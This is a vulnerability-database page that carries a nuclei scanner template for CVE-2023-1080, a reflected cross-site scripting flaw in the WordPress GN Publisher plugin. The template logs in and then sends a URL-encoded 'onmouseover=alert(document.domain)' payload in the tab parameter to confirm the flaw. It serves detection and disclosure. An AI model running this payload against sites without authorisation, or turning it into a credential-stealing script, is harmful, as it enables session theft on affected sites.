Lucene search
K

WordPress GN Publisher <1.5.6 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WordPress GN Publisher plugin <1.5.6 is vulnerable to Cross-Site Scripting (XSS) via the tab parameter, allowing attackers to execute arbitrary scripts and steal sensitive information. Fixed in version 1.5.6

Related
Refs
Code
id: CVE-2023-1080

info:
  name: WordPress GN Publisher <1.5.6 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
  remediation: Fixed in version 1.5.6.
  reference:
    - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74
    - https://wordpress.org/plugins/gn-publisher/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1080
    - https://plugins.trac.wordpress.org/browser/gn-publisher/trunk/templates/settings.php#L70
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1080
    cwe-id: CWE-79
    epss-score: 0.0126
    epss-percentile: 0.66065
    cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gnpublisher
    product: gn_publisher
    framework: wordpress
  tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "/ onmouseover=alert(document.domain);//")'
          - 'contains(body_2, "GN Publisher")'
        condition: and
# digest: 4a0a00473045022100d44ac60ab703a618ca73d18dae4b5843651f697ba072d38ce0afc566d26815aa02207da44b7c8d5244415b6ee0ee41ecf271cc22c9ac8f1c364783555b1bbd246497:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.0126
SSVC
26